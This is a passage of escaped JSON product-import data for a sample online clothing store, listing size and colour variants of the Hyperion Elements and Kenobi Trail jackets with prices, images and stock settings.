pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"237\":{\"sku\":\"MJ02-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-XL-Orange\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"238\":{\"sku\":\"MJ02-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-XL-Red\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"239\":{\"sku\":\"MJ02\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Insulated|Rain Coat|Hard Shell|Windbreaker|&frac14; zip,material=Fleece|LumaTech&trade;|Polyester,pattern=Solid,climate=Cool|Rainy|Spring|Windy,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MJ02-XS-Green,size=XS,color=Green|sku=MJ02-XS-Orange,size=XS,color=Orange|sku=MJ02-XS-Red,size=XS,color=Red|sku=MJ02-S-Green,size=S,color=Green|sku=MJ02-S-Orange,size=S,color=Orange|sku=MJ02-S-Red,size=S,color=Red|sku=MJ02-M-Green,size=M,color=Green|sku=MJ02-M-Orange,size=M,color=Orange|sku=MJ02-M-Red,size=M,color=Red|sku=MJ02-L-Green,size=L,color=Green|sku=MJ02-L-Orange,size=L,color=Orange|sku=MJ02-L-Red,size=L,color=Red|sku=MJ02-XL-Green,size=XL,color=Green|sku=MJ02-XL-Orange,size=XL,color=Orange|sku=MJ02-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Insulated|Rain Coat|Hard Shell|Windbreaker|&frac14; zip\",\"material\":\"Fleece|LumaTech&trade;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Cool|Rainy|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"240\":{\"sku\":\"MJ04-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-XS-Black\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"241\":{\"sku\":\"MJ04-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-XS-Blue\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"242\":{\"sku\":\"MJ04-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-XS-Purple\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"243\":{\"sku\":\"MJ04-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-S-Black\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"244\":{\"sku\":\"MJ04-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-S-Blue\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\